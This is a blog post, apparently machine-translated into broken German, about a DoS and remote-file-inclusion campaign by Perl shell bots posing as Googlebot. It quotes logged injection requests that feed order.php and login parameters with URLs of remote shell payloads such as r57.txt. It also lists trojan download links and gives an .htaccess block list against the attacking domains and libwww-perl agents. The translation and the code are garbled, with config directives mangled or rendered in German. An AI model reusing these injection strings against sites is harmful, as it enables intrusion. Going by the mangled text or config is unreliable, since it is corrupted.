Für diese letzten drei Tage dieses Blog leidet DoS-Attacke. Der Angriff ist noch heute lebendig Ich glaube nicht, dass sie sich noch verlassen. I cant verboten diese Bot direkt als sie das Senden Schmiede Päckchen (Packet Spoofing) als googlebot http://www.whois-search.com/whois/64.233.166.136. Ich bin noch auf der Suche nach der richtigen Internet-Anbieter.
OrgName: Google Inc. OrgID: GOGL Adresse: 1600 Amphitheatre Parkway City: Mountain View StateProv: CA PLZ: 94043 Land: USAZu dem Zeitpunkt, als ich blockiert alle Remote-Streams von ihren zufälligen Host *. com und "Perl Bot Unterschrift", aber blockiert werden nicht aufhören, sie aus Hämmern dieser Website. Ich werde das Senden 503 (Service nicht verfügbar) über bestimmte Anfrage so, wenn Sie Problem mit dem Zugriff auf diese Website wenden Sie sich bitte versuchen Sie es später erneut.
Art der Injektionen
Es ist viel uri-Parameter in meinen Logs (Ich werde deaktiviert Server Logs - limit Ressourcen) hat sie wahrscheinlich eine große Vorräte Check-Listen bekannter CMS Sicherheitslücken. Ich kann nur bestätigen, dass ihr ein BlackHat seo Spam Bots wie sie Anforderungs-URI gehören die typischen order.php Seite.
/ es / wordpress / how-to-entfernt-WordPress-net-in-Spam-Injection-infiziert-von-mike-ja gger-goro-class-mailphp/order.php /? wp = http://hom3.t35 .com / xpl / hack / id.txt? / es / wordpress / order.php /? wp = http://hom3.t35.com/xpl/hack/id.txt? / order.php? wp = http://hom3.t35.com/xpl/hack/id.txt?
Um die folgenden Quelle benötigen Sie den Ausschluss der Website von Host Ihr Anti-Virus-Programm.
- Perl / ShellBot.B Trojan - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
- PHP / Rst.S Trojan - http://hom3.t35.com/xpl/fidz
htaccess-Code gesperrt schlecht Injektor und Perl-Bot (Botnetzes)
Wenn Sie ähnliche Probleme hat. Sie sollten die folgenden Block-Domain in Ihrer htaccess.
mod_setenvifSetEnvIfNoCase Referer "^ http:// (www.)? T35 \. Com" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Jorgevolio \. Com" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? emabe \. com "codeinjector_ref = 1 SetEnvIfNoCase Referer" ^ http:// (www.)? pawang \. "codeinjector_ref = 1 SetEnvIfNoCase Referer" ^ http:// (www.)? gw-Gold \. net "codeinjector_ref = 1 SetEnvIfNoCase User-Agent" ^ libwww-perl * "shell_bots = 1 SetEnvIfNoCase User-Agent" ^ Amidalla * "shell_bots = 1 <FilesMatch "(.*)"> Order allow, deny Allow Deny aus allen von env = codeinjector_ref Verweigern von env = shell_bots </ FilesMatch>wenn u arent sicher, ob Sie Server-Unterstützung mod_setenvif wrap it like Das folgende Beispiel.
<IfModule Mod_setenvif.c> # ... ersetzen Sie diese Zeile mit den oben genannten Code ... </ IfModule>
Wie fangen Perl-Shell-Bot
Wir brauchen ein Muster zum Fang dieser Bots. wir sicher wussten, dass diese Bots:
- keine Ehre robot.txt
- sie alle Crawl-Unterverzeichnis
- sie hat ein Muster URI-Anfrage
Im Moment habe ich nur schaffen Unterverzeichnis für Auto-Verbot (und einige andere Dinge) auf der Grundlage ihrer Muster. alexa Bot wird auch verboten, da sie nicht robot.txt Ehre.
I'll be Aktualisierung dieser Stelle von Zeit zu Zeit. Prüfen Sie das interessante Artikel über die Päckchen Spoofing und Validierung Schmiede / Spoof Päckchen.
Jüngste Scan & Aktualisieren
Die folgende Liste wird automatisch hinzugefügt.
- 24. Dezember 2007
- ip: 64.26.63.10 param: login =? injizieren: http://pawang.in/r57.txt
- 24. Dezember 2007
- ip: 64.26.63.10 param: dir =, login = injizieren: http://pawang.in/r57.txt?
- 25. Dezember 2007
- IP: 59.158.128.138 param: p =,: = spritzen allinurl: http://gw-gold.net/jpg/pictures/test.txt
Externe Ressourcen
- 21. Dezember 2007 um 10:48 Uhr
- 16. Februar 2008 um 3:05
- 0,3
- URL
Keine Kommentare zu "Mass Remote Code Injection als Googlebot - Packet Spoofing Perl-Bot & Trojan"
Trackback URL: Verwenden Sie die ↑ TrackBack-URL zu diesem Artikel Ping. Wenn Ihr Blog nicht unterstützt Trackbacks Vielleicht möchten Sie einen Kommentar hinterlassen.
"schreiben, als ob Sie sich unterhielten, ein guter Freund (vor Ihrer Mutter)."
. Ihre Meinung zählt
Disclaimer: Für alle Inhalte, die Sie veröffentlichen, gewähren Sie hiermit zu Kakkoi die gebührenfreie, unwiderrufliche, unbefristete, exklusive und vollständig sublizenzierbare Lizenz zu nutzen, zu reproduzieren, zu modifizieren, anzupassen, zu veröffentlichen, zu übersetzen, abgeleitete Arbeiten erstellen, verteilen, die Durchführung und den Anzeige solcher Inhalte ganz oder teilweise, welt-weit zu tragen und sie in anderen Werken, in irgendeiner Form, Medien oder Technologie jetzt bekannt ist oder später entwickelt. Some rights reserved.
Die folgenden "Code" sind so konzipiert, schützen Sie und andere Nutzer dieser Website.
Um diese Erfahrungen angenehm und interessant für alle unsere Nutzer, bitten wir Sie, folgen Sie den oben genannten Richtlinien.
als erstes zur Stellungnahme.